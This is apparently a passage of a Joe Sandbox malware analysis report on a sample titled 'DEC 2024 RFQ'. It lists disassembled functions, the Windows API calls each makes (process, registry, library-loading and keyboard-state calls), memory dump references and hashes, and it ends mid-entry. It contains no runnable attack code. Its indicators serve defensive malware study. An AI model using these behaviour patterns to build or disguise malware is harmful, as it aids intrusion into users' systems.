                                                                                                                      Function 00081AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00081B19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                      • API String ID: 3964851224-769500911
                                                                                                                      • Opcode ID: 0dcfc83b6d834fe137906099dceb0168992b43a3eb0b9ea09a685b03e2abab37
                                                                                                                      • Instruction ID: 0f7eafb6905cafcf19aaa704861d86411cbf0d0cf3cae02a0a1c94a6159ba23f
                                                                                                                      • Opcode Fuzzy Hash: 0dcfc83b6d834fe137906099dceb0168992b43a3eb0b9ea09a685b03e2abab37
                                                                                                                      • Instruction Fuzzy Hash: 3D1180B09402199FCF40EFA4E8518FEB7B8FF26304F1084A9D858A7392EB325D06CB54
                                                                                                                      Function 0009EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0009EC07
                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0009EC37
                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0009ED6A
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0009EDEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2364364464-0
                                                                                                                      • Opcode ID: 1d61a05fe6e28d8dbc5b1f9bfaba11dd9a87a7e25dfde9eeeb756e95e94166ff
                                                                                                                      • Instruction ID: 7902dd8618ba2678b1f970d9300962845549c69c19ef97224a6a95afb9b717b4
                                                                                                                      • Opcode Fuzzy Hash: 1d61a05fe6e28d8dbc5b1f9bfaba11dd9a87a7e25dfde9eeeb756e95e94166ff
                                                                                                                      • Instruction Fuzzy Hash: A3818271600710AFDB60EF28D886F6AB7E5AF48710F44881DF999DB2D2DB70AC44CB51
                                                                                                                      Function 000A0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 000A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0009FDAD,?,?), ref: 000A0E31
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000A00FD
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000A013C
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000A0183
                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 000A01AF
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000A01BC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3440857362-0
                                                                                                                      • Opcode ID: 97de699e22d93c24a56abcf4d2a2603a34f1ef32eb448d54fecc242bbecdb52a
                                                                                                                      • Instruction ID: 32890c1ca6ac7a23cc6900984ebe4ed1dba2c15714907d7141730226597b9d91
                                                                                                                      • Opcode Fuzzy Hash: 97de699e22d93c24a56abcf4d2a2603a34f1ef32eb448d54fecc242bbecdb52a
                                                                                                                      • Instruction Fuzzy Hash: 6C519E71208205AFD714EF94DC91EAEB7E8FF85304F40492DF595872A2DB31E944CB52
                                                                                                                      Function 0009D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0009D927
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0009D9AA
                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0009D9C6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0009DA07
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0009DA21
                                                                                                                        • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00087896,?,?,00000000), ref: 00025A2C
                                                                                                                        • Part of subcall function 00025A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00087896,?,?,00000000,?,?), ref: 00025A50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 327935632-0
                                                                                                                      • Opcode ID: 332c6fc037da5f4bca45286ebc5d6250bb277d61e9444b6953e7a2a31458bca9
                                                                                                                      • Instruction ID: df72ca67dc85cc393e0cdae25259af7fa6506eb34985ebd62aad16cd2a03e38d
                                                                                                                      • Opcode Fuzzy Hash: 332c6fc037da5f4bca45286ebc5d6250bb277d61e9444b6953e7a2a31458bca9
                                                                                                                      • Instruction Fuzzy Hash: EE512635A00619DFCB00EFA8D8849ADB7F5FF19324B0480A6E859AB312DB31ED45CF91
                                                                                                                      Function 0008E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0008E61F
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0008E648
                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0008E687
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0008E6AC
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0008E6B4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1389676194-0
                                                                                                                      • Opcode ID: a90b2059e217d63bb11f4ed9d8bfe100517bb69af7cac4ad9e8b0f11f0fe2eb9
                                                                                                                      • Instruction ID: b128055b1bf13273398d54a2daef6bb9794b91aeb8a06b1cb90cb27007307793
                                                                                                                      • Opcode Fuzzy Hash: a90b2059e217d63bb11f4ed9d8bfe100517bb69af7cac4ad9e8b0f11f0fe2eb9
                                                                                                                      • Instruction Fuzzy Hash: D6512735A00615DFCB01EF64D981AAEBBF5FF09314F1880A9E849AB362DB31ED11DB54
                                                                                                                      Function 000AA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 197bbe1803be6e20787745a54e8a1829ee7556a113225832a28504a83e5c2e41
                                                                                                                      • Instruction ID: 88024e34078931ec3621327b0c760bdc1bd0c379b72f0e91f57247e846fd08dc
                                                                                                                      • Opcode Fuzzy Hash: 197bbe1803be6e20787745a54e8a1829ee7556a113225832a28504a83e5c2e41
                                                                                                                      • Instruction Fuzzy Hash: A841B135A04504BFD760DFA8CC88FB9BBE8EB0B310F140665F916A72E1CB34AD41DA51
                                                                                                                      Function 00022344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 00022357
                                                                                                                      • ScreenToClient.USER32(000E57B0,?), ref: 00022374
                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00022399
                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 000223A7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210589936-0
                                                                                                                      • Opcode ID: 2b3f172f134ce9467c65b35d7078d653525f4378824f731a84f549ef33798f4b
                                                                                                                      • Instruction ID: 5215c517c964a54b34ca3a1d0649f3ee681d2865ba5f6bae100e4c2c8197ba21
                                                                                                                      • Opcode Fuzzy Hash: 2b3f172f134ce9467c65b35d7078d653525f4378824f731a84f549ef33798f4b
                                                                                                                      • Instruction Fuzzy Hash: 57418335504215FFDF25DFA8C844AEEBBB4FB05365F204315F82892190C735AA54DB90
                                                                                                                      Function 000763AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000763E7
                                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00076433
                                                                                                                      • TranslateMessage.USER32(?), ref: 0007645C
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00076466
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00076475
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2108273632-0
                                                                                                                      • Opcode ID: 37a2ef37531dbdc4858821bc53d5fb4b496a006733d272ae20db746335511043
                                                                                                                      • Instruction ID: 53054dd8968aac6f2eb11b0d9a132b952aa3fb9faed2bf7364857e8ac7cad24a
                                                                                                                      • Opcode Fuzzy Hash: 37a2ef37531dbdc4858821bc53d5fb4b496a006733d272ae20db746335511043
                                                                                                                      • Instruction Fuzzy Hash: 2F312D70D00E42AFEB64CFB0DC84BB67BECAB01705F148569E51AE71A0D73E9445D764
                                                                                                                      Function 00078A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00078A30
                                                                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00078ADA
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00078AE2
                                                                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00078AF0
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00078AF8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3382505437-0
                                                                                                                      • Opcode ID: 18e6c597f77dd0417df08f1a4e28f0cba65b1f924ec6fa1a7d805f8d58199680
                                                                                                                      • Instruction ID: 1c9c7b667cade136add0fb5dc971d2de6d3b1ccde72576c154eef22c39a3295b
                                                                                                                      • Opcode Fuzzy Hash: 18e6c597f77dd0417df08f1a4e28f0cba65b1f924ec6fa1a7d805f8d58199680
                                                                                                                      • Instruction Fuzzy Hash: 4E31C271900219FBEF14CFA8D94CAAE3BB5EB05315F10C22AF929E61D1C7B49914DB91
                                                                                                                      Function 0007B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 0007B204
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0007B221
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0007B259
                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0007B27F
                                                                                                                      • _wcsstr.LIBCMT ref: 0007B289
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3902887630-0
                                                                                                                      • Opcode ID: f0c1f7777cf4c45e61056a711e3ef83d8424ead6cdbfe55168fd31f703078db7
                                                                                                                      • Instruction ID: 00c3fbdfcf520a9e6233ae8089f60db5137f25b3bae1384c9499eefc3a0ff8a6
                                                                                                                      • Opcode Fuzzy Hash: f0c1f7777cf4c45e61056a711e3ef83d8424ead6cdbfe55168fd31f703078db7
                                                                                                                      • Instruction Fuzzy Hash: E1210771A052057BEB255B799C09F7F7B9CDF4A750F008139F808DA162EF79DC4192A4
                                                                                                                      Function 000AB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000AB192
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 000AB1B7
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000AB1CF
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 000AB1F8
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00090E90,00000000), ref: 000AB216
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2294984445-0
                                                                                                                      • Opcode ID: 3f9f46c8f0d400982d2cba812dbf33cfcca443859eb5d660ddb2dbbf5842c543
                                                                                                                      • Instruction ID: 20954b792be2502f362cc4f38d93ea9578b9813c321ca9776b117dbb6d7f4219
                                                                                                                      • Opcode Fuzzy Hash: 3f9f46c8f0d400982d2cba812dbf33cfcca443859eb5d660ddb2dbbf5842c543
                                                                                                                      • Instruction Fuzzy Hash: 1521B431910651AFDB609FB8DC04B6A37A4FB07721F104B35F932D71E1E73098218B80
                                                                                                                      Function 00079307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00079320
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00079352
                                                                                                                      • __itow.LIBCMT ref: 0007936A
                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00079392
                                                                                                                      • __itow.LIBCMT ref: 000793A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow$_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2983881199-0
                                                                                                                      • Opcode ID: a71c14b50a556b2e470dcebca253fae1959b525f4a0c87c9b055fb9fba9718d7
                                                                                                                      • Instruction ID: 1a92698145028bb8f80c90d75fac27a9464b54f98593ceab1ddfce2611cb2f20
                                                                                                                      • Opcode Fuzzy Hash: a71c14b50a556b2e470dcebca253fae1959b525f4a0c87c9b055fb9fba9718d7
                                                                                                                      • Instruction Fuzzy Hash: E821F931B01218BBDB119FA49C85EEE7BADEB49710F048029FD0DEB1D1D6B4CE4187A5
                                                                                                                      Function 00095A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(00000000), ref: 00095A6E
                                                                                                                      • GetForegroundWindow.USER32 ref: 00095A85
                                                                                                                      • GetDC.USER32(00000000), ref: 00095AC1
                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00095ACD
                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00095B08
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4156661090-0
                                                                                                                      • Opcode ID: c202d7fd7e43058ea9c9ea2d0377650350bb7b6d0e36f3cf57950a32219c5a6c
                                                                                                                      • Instruction ID: e3a81223531db52f973f6eb1d54c55b4742433fb2fc71a4b8963ca31d84b2d38
                                                                                                                      • Opcode Fuzzy Hash: c202d7fd7e43058ea9c9ea2d0377650350bb7b6d0e36f3cf57950a32219c5a6c
                                                                                                                      • Instruction Fuzzy Hash: 60219D35A00604AFDB14EFA5DD88AAABBF5EF49311F148079F849D7362CA34AC40DB90
                                                                                                                      Function 000212F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0002134D
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0002135C
                                                                                                                      • BeginPath.GDI32(?), ref: 00021373
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0002139C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
